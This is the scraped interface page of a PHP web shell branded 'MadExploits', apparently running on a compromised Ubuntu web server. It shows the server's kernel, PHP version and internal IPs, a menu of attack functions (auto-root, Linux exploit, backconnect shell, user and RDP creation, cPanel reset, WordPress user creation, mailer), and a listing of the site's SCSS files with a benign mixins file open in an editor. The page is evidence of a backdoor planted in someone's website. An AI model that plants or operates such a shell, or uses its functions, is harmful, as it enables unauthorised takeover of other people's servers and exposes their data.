Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
assets /
css /
scss /
[ HOME SHELL ]
Name
Size
Permission
Action
_benifit.scss
16.87
KB
-rwxr-x--x
_card.scss
2.23
KB
-rwxr-x--x
_contact-us.scss
11.27
KB
-rwxr-x--x
_cta.scss
1.47
KB
-rwxr-x--x
_event.scss
4.04
KB
-rwxr-x--x
_expanded-menu.scss
4.44
KB
-rwxr-x--x
_footer.scss
6.67
KB
-rwxr-x--x
_global.scss
232
B
-rwxr-x--x
_header.scss
6.46
KB
-rwxr-x--x
_home.scss
5.54
KB
-rwxr-x--x
_jobs.scss
3.46
KB
-rwxr-x--x
_latestnews.scss
3.46
KB
-rwxr-x--x
_media-cover.scss
3.46
KB
-rwxr-x--x
_mixins.scss
894
B
-rwxr-x--x
_modern-normalize.scss
5.19
KB
-rwxr-x--x
_modify.scss
8.62
KB
-rwxr-x--x
_parnership.scss
323
B
-rwxr-x--x
_publication.scss
434
B
-rwxr-x--x
_scroll.scss
682
B
-rwxr-x--x
_typography.scss
126
B
-rwxr-x--x
_variables.scss
866
B
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _mixins.scss
@use "sass:math"; // px convert to rem @mixin toRem($property, $value) { #{$property}: math.div($value,16) + rem; } // px convert to rem for box-shadow @mixin toRem-box-shadow($h, $v, $b, $s, $c) { box-shadow: math.div($h,16)+rem math.div($v,16)+rem math.div($b,16)+rem math.div($s,16)+rem $c; } // px convert to rem for box-shadow inset @mixin toRem-box-shadow-inset($h, $v, $b, $s, $c) { box-shadow:inset math.div($h,16)+rem math.div($v,16)+rem math.div($b,16)+rem math.div($s,16)+rem $c ; } // media quried min width @mixin mqmin($break) { @media (min-width: $break) { @content; } } // media quried max width @mixin mqmax($break) { @media (max-width: $break) { @content; } } // media quried min and max width @mixin mq-min-max($minbreak, $maxbreak) { @media (min-width: $minbreak) and (max-width: $maxbreak) { @content; } }
Close